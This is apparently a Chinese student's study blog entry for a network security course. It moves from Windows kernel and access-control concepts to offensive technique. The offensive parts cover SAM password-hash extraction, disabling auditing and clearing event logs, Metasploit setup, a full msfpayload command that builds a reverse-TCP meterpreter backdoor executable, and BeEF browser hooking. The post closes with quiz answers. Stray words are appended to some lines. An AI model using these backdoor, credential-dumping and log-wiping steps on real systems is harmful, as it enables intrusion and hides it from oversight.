windows操做系統內核實現的核心機制有:java
- Windows進程和線程管理機制
- Windows內存管理機制(Windows的虛擬內存空間分爲系統核心內存區與用戶內存區間兩部分,系統核心內存用於映射內核、HAL、Win32k.sys等內核執行模塊,並存儲內核內存對象,對於內核中運行的特權代碼,則可經過DKOM技術來進行枚舉和操縱)、
- Windows文件管理機制(NTFS)、
- Windows註冊表管理機制(註冊表中的系統自啓動掛接點上註冊的應用軟件能夠隨系統引導而自動運行,所以也是不少惡意代碼及流氓軟件廣泛的攻擊目標)、
- Windows的網絡機制(從OSI網絡參考模型的物理層到應用層,各層上對應的Windows網絡組件模塊包括以下:
①各層網卡硬件的設備驅動程序,處於OSI參考模型的物理層
②NDIS庫及miniport驅動程序,位於OSI鏈路層
③TDI,對應OSI網絡層與傳輸層
④網絡APIDLL及TDI客戶端,對應OSI會話層與表示層
⑤網絡應用程序與服務進程,對應OSI應用層)。
Windows的受權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同來實施。
在Windows服務器操做系統中,用戶能夠執行內建的whoami命令來查看當前用戶的訪問令牌信息。
Windows對於系統中全部需保護的資源都抽象成對象,具體類型包括文件、目錄、註冊表鍵值、內核對象、同步對象、私有對象、管道、內存、通訊接口等,而對每一個對象會關聯一個SD安全描述符.
對象安全描述符由以下主要屬性組成:Owner SID、Group SID、DACL自主訪問控制列表、SACL系統審計訪問控制列表。linux
Windows遠程攻防技術能夠分爲如下幾大類:遠程口令猜想與破解攻擊、攻擊Windows網絡服務、攻擊Windows客戶端及用戶。
Windows系統上的安全漏洞生命週期:漏洞發現與披露、滲透測試與利用攻擊、漏洞修補等。sql
身份認證、受權與訪問控制以及安全審計是三個基本安全功能。
保護Windows系統安全穩定運行最爲關鍵的三項安全措施——防火牆、補丁自動更新以及病毒防禦。
除安全中心以外,Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等shell
在本地獲取口令字密文的主要包括以下三種途徑:
①從另外一種操做系統啓動後拷貝文件系統中的口令密文文件
②利用硬盤修復工具包中的rdisk工具,執行「rdisk/s-」命令建立SAM備份文件副本
③使用pwdumpX系列工具直接從SAM文件或活動目錄中提取口令字密文。數據庫
①關閉審計功能(Windows Resource Kit工具包裏的auditpol程序可讓他們輕易地關閉審計功能)
②清理事件日誌(使用Event Viewer事件查看器來打開、讀取和清除這臺主機上的事件日誌)windows
漏洞檢索工具:Exploit Datebase>searchsploit
檢索wordpass的漏洞,能夠看到對應的文件地址
經過相對目錄進入到文件對應的地址
cat查看文件內容
api
在Kali中使用metasploit,須要先啓動Postgre
SQL數據庫服務和metasploit服務,而後就能夠完整的利用msf數據庫查詢exploit和記錄。瀏覽器
service postgresql start service metasploit start
若是 不想每次開機都手動啓動服務,能夠配置隨系統啓動
update-rc.d postgresql enable
update-rc.d metasploit enable安全
Kali中msf的路徑爲/usr/share/metasploit-framework服務器
Auxiliary:輔助模塊
encoders:供msfencode編碼工具使用,具體可使用msfencode -l。
exploits:攻擊模塊,每一個介紹msf的文章都會提到那個ms08_067_metapi,它就在這個目錄。
payloads:這裏面列出的是攻擊載荷,也就是攻擊成功後執行的代碼,好比咱們常設置的windows/meterpreter/reverse_tcp就在這個文件夾下。
post:後滲透階段模塊,在得到meterpreter的shell以後可使用的攻擊代碼。好比經常使用的hashdump、arp_scanner就在這裏。
msfpayload:用來生成payload或者shellcode。
搜索的時候能夠用msfpayload -l | grep "windows"這樣的命令查詢。
-o 選項能夠列出payload所需的參數
msfencode:msf中的編碼器,早期爲了編碼繞過AV,如今經常使用msfpayload與它編碼避免exploit的壞字符串。
msfconsole:開啓metasploit的console
發現漏洞 使用命令nmap -sV 192.168.1.124
使用set設置參數
Meterpreter是metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用,攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個meterpreter shell連接。
Meterpreter做爲後滲透模塊有多種類型,而且命令由核心命令和擴展庫命令組成,極大的豐富了攻擊方式。其有不少有用的功能,如添加一個用戶、隱藏一些東西、打開shell、獲得用戶密碼、上傳下載遠程主機文件、運行cmd.exe、捕捉屏幕、獲得遠程控制權、捕獲按鍵信息、清楚應用程序、顯示遠程主機的系統信息、顯示遠程機器的網絡接口和IP地址等信息。
經常使用的命令:
background:將當前會話放置後臺
load/use:加載模塊
Interact:切換進一個信道
migrate:遷移進程
run:執行一個已有的模塊,這裏要說的是輸入run後按兩下tab,會列出全部的已有的腳本,經常使用的有autoroute,hashdump,arp_scanner,multi_inject等
Resource:執行一個已有的rc腳本經常使用的Meterpreter類型爲:payload/windows/meterpreter/reverse_tcp
針對windows操做系統,反向鏈接shell,使用起來比較穩定。
命令:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
此時瀏覽器自動打開頁面
http://127.0.0.1:3000/ui/authentication
使用默認用戶名beef與默認密碼beef登陸
三、HOOK持續的時間爲關閉測試頁面爲止,在此期間,至關於被控制了,能夠發送攻擊命令,在Commands模塊,咱們能夠完成不少任務:
其中,4種顏色分別表示:
綠色:該攻擊模塊可用,且隱蔽性強
灰色:該攻擊模塊可用,但隱蔽性差
橙色:該用戶模塊是否可用還有待驗證
紅色:該攻擊模塊不可用
四、例如,選取MISC下的Raw JavaScript模塊做爲測試用例,右端表格有該模塊的詳細說明,以及一些可用的參數等。輸入JavaScript code,點擊Excute進行攻擊。
六、BeFF默認是不加載Metasploit的,若是要使用Metasploit豐富的攻擊模塊,須要作些配置。
修改/usr/share/beef-xss/config.yaml中的metasploit 一行爲true
保證此處IP等信息設置正確(不適用127.0.0.1,需使用本機IP),並修改Custom路徑
配置好後,打開msfconsole,運行命令:
load msgrpc ServerHost=192.168.1.124 Pass=abc123
一、下面哪些Linux 命令能夠ASCII碼和16進制單字節方法輸出Hello.java的內容?
od -tcx1 Hello.java od -tc -tx1 Hello.java
二、Netwox能夠產生的數據報文有(IP、TCP、UDP)
三、中間人攻擊能夠破壞信息的機密性和完整性。
四、評估IDS的參數中,捕獲的攻擊和所有攻擊之比爲(檢測率)
五、netfilter/iptables的規則表中,能夠進行源IP和端口轉換的是(nat表)
六、防火牆部署方式中,不能實現網絡層和應用層雙重安全的是?包過濾路由器、雙宿主堡壘主機
學習時間(新增/累計) | 博客量(新增/累計) | 重要成長 | |
---|---|---|---|
目標 | 400小時 | 30篇 | |
第1周 | 15/15 | 1/1 | linux基礎知識 |
第2周 | 20/35 | 2/3 | 安全工具、環境搭建 |
第3周 | 15/50 | 2/5 | Nma使用 |
第4周 | 15/65 | 1/6 | |
第5周 | 15/80 | 1/7 | |
第6周 | 15/95 | 1/8 | |
第7周 | 12/107 | 1/9 |